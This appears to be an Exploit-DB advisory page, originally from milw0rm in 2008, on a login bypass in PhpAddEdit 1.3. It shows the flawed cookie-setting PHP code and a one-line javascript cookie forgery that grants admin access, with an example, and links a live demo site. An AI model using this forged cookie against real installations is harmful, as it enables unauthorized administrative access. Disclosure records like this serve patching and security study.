PhpAddEdit 1.3 Login By Pass

vendor:

PhpAddEdit

by:

x0r (Evolution Team)

7.5

CVSS

HIGH

287

CWE

Product Name: PhpAddEdit

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: Yes

Related CWE: N/A

CPE: a:phpaddedit:phpaddedit:1.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PhpAddEdit 1.3 Login By Pass

PhpAddEdit 1.3 is vulnerable to a login bypass vulnerability. An attacker can bypass the authentication process by setting the 'addedit' cookie to the username of the admin. This can be done by using the following javascript code: javascript:document.cookie = 'addedit=[adminuser]; path=/';

Mitigation:

Upgrade to the latest version of PhpAddEdit 1.3

Source

Exploit-DB raw data:

-------------------------------------
   PhpAddEdit 1.3 Login By Pass 
-------------------------------------

Found By: x0r ( Evolution Team )
Email: andry2000@hotmail.it
-------------------------------------

Bug In: Addedit-login.php

		if (!$login_error) {
			// --- Set admin cookie so favorite form field will show up when I use
the site...
			if ($_POST["rememberme"]) {
				$expire = mktime(0,0,0,date("m"),date("d")+120,date("Y"));
				setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0);
			} else {
				setcookie("addedit", $_POST["adminuser"]);
			}
			Header("Location:  ./");
		}
	}
	
Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^
-------------------------------------

Exploit:

javascript:document.cookie = "addedit=[adminuser]; path=/";

es:

javascript:document.cookie = "addedit=x0r; path=/";
--------------------------------------
Live Demo: http://www.phpaddedit.com/demo/
--------------------------------------
Greetz: Amore oggi +65 ti amo troppo.

# milw0rm.com [2008-12-11]